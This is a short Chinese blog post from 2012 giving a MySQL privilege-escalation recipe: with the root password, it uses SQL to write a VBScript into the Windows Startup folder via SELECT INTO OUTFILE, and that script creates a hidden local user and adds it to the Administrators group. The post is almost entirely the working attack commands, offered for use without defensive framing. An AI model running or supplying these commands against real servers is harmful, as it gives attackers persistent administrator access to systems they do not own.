不支持PHP情况下,3306端口远程连接mysql提权

思路:写入启动项目揽权

有root密码了,Navicat连接上去

执行sql语句

  1. create table a (cmd text);  

 

  1. insert into a values (“set wshshell=createobject (“”wscript.shell”" ) ” );  

 

  1. insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1/add”",0) ” );  

 

  1. insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add”",0) ” );  

 

  1. select * from a into outfile “c:\\xxxxxxxx\\xxxxx\\「开始」菜单\\程序\\启动\\a.vbs”; 

posted on 2012-09-08 05:20  =_=!  阅读(436)  评论(0编辑  收藏  举报

导航